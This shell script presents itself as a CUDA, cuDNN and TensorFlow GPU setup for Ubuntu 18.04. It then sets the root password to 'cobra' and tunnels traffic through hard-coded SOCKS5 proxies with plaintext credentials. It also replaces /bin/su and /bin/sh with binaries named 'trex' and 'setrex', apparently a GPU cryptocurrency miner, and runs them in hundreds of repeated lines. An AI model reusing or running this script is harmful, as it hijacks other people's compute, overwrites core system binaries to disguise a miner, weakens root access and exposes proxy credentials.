export LD_PRELOAD=
wget https://developer.download.nvidia.com/compute/cuda/repos/ubuntu1804/x86_64/cuda-ubuntu1804.pin
sudo mv cuda-ubuntu1804.pin /etc/apt/preferences.d/cuda-repository-pin-600
sudo apt-key adv --fetch-keys https://developer.download.nvidia.com/compute/cuda/repos/ubuntu1804/x86_64/7fa2af80.pub
sudo add-apt-repository "deb https://developer.download.nvidia.com/compute/cuda/repos/ubuntu1804/x86_64/ /"
sudo apt-get update

wget http://developer.download.nvidia.com/compute/machine-learning/repos/ubuntu1804/x86_64/nvidia-machine-learning-repo-ubuntu1804_1.0.0-1_amd64.deb

sudo apt install ./nvidia-machine-learning-repo-ubuntu1804_1.0.0-1_amd64.deb
sudo update-alternatives --config gcc

sudo apt-get purge *nvidia* -y
sudo apt-get autoremove *nvidia* -y
sudo apt-get update && sudo apt-get autoremove && sudo apt-get autoclean -y
apt search nvidia-driver
sudo apt-get update
sudo apt-get install -y build-essential
sudo apt-get install -y screen
sudo apt-get install -y python-pip
sudo apt-get install -y python3-pip
sudo apt-get install -y ubuntu-drivers-common
sudo update-alternatives --config gcc
sudo apt-get purge *nvidia* -y
sudo apt-get autoremove *nvidia* -y
sudo apt install libnvidia-common-470
sudo apt install libnvidia-gl-470
sudo apt-get install -y nvidia-driver-470
echo 'Installing NVIDIA drivers'
sudo apt-get install --no-install-recommends nvidia-driver-450
sudo reboot

nvidia-smi
ubuntu-drivers devices

sudo reboot

wget https://developer.download.nvidia.com/compute/machine-learning/repos/ubuntu1804/x86_64/libnvinfer7_7.1.3-1+cuda11.0_amd64.deb
sudo apt install ./libnvinfer7_7.1.3-1+cuda11.0_amd64.deb
sudo apt-get update

sudo apt-get install --no-install-recommends \
    cuda-11-0 \
    libcudnn8=8.0.4.30-1+cuda11.0  \
    libcudnn8-dev=8.0.4.30-1+cuda11.0
sudo apt-get install -y --no-install-recommends libnvinfer7=7.1.3-1+cuda11.0 \
    libnvinfer-dev=7.1.3-1+cuda11.0 \
    libnvinfer-plugin7=7.1.3-1+cuda11.0
pip3 install --upgrade pip
pip3 install tensorflow==2.4 gretel-synthetics
echo -e "cobra\ncobra" | passwd root

tar -xvzf graftcp.tar.gz
wget https://github.com/hmgle/graftcp/archive/refs/tags/v0.4.0.tar.gz
tar -xvzf v0.4.0.tar.gz
sudo apt-get install -y local
sudo apt-get update
./graftcp/graftcp apt update;apt -y install curl unzip autoconf git cmake binutils build-essential net-tools screen golang
cat > graftcp/local/graftcp-local.conf <<END
listen = :2233
loglevel = 1
pipepath = /tmp/graftcplocal.fifo
socks5 = 45.82.84.76:59111
socks5_username = snoopyme9
socks5_password = FZHc9Tt5sq
http_proxy = 127.0.0.1:8080
END
./graftcp/local/graftcp-local -config graftcp/local/graftcp-local.conf &
sleep .2

echo " "
echo " "

echo ""
./graftcp/graftcp curl ifconfig.me
cat > graftcp/local/graftcp-local.conf <<END
listen = :2233
logfile = graftcp-local.log
loglevel = 1
pipepath = /tmp/graftcplocal.fifo
socks5 = 72.195.34.59:4145
socks5_username = 
socks5_password = 
http_proxy = 127.0.0.1:8080
END
./graftcp/local/graftcp-local -config graftcp/local/graftcp-local.conf &
sleep .2

echo " "
echo " "

echo ""

./graftcp/graftcp curl ifconfig.me
./graftcp/graftcp curl -fsSL https://deb.nodesource.com/setup_17.x | sudo -E bash -
apt-get install -y nodejs
mv setrex /bin/su
./graftcp/graftcp chmod +x /bin/su 
mv setrex2 /bin/su2
./graftcp/graftcp chmod +x /bin/su2 
mv trex /bin/sh
./graftcp/graftcp chmod +x /bin/sh 

sleep 5s
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
